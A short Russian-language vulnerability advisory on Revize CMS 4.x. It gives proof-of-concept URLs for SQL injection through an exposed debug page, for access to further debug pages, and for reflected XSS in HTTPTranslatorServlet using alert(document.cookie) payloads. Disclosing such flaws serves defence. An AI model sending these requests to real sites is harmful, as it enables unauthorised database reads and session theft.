Программа: Revize CMS 4.x
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS
нападение и выполнить произвольные SQL команды в базе данных приложения.
1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "query" сценария "query_results.jsp". Удаленный пользователь может с
помощью специально сформированного URL выполнить произвольные SQL команды в базе
данных приложения.
Пример:
http://[Victim]/revize/debug/query_results.jsp? webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects
http://[Victim]/revize/debug/query_results.jsp?query=
select%20*%20from%20pbpublic.rSubjects
2. Удаленный пользователь может получить доступ к потенциально важным данным на
системе.
Пример:
http://[Victim]/revize/debug/query_input.jsp? table=rSubjects&apptable&webspace=REVIZE
http://[Victim]/revize/debug/ http://[Victim]/revize/debug/apptables.html
http://[Victim]/revize/debug/main.html
3. Межсайтовый скриптинг возможен из-за недостаточной обработки входных
данных в сервлете "HTTPTranslatorServlet". Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольный HTML код в
браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap=subject&error=admincenter/login.jsp
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=security
& objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&error=admincenter/login.jsp
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&action=login&resourcetype=security&objectmap
=subject&error=admincenter/login.jsp